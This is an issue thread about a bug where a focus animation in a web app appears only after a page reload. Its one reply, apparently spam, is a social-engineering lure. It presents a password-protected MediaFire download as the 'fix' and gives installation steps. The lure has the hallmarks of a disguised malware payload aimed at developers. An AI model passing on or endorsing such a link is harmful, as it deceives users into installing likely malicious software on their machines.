### ISSUE TITLE
The clear focuses function bug

### ISSUE THREAD

**Issue by konard** [link-foundation/deepcase-app#121]
The clear focuses function is triggered only after the page is reloaded, before that there is no focus animation, but there is focus

---
Forked from https://github.com/deep-foundation/deepcase-app/issues/179 by https://github.com/konard/gh-org-migrator

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
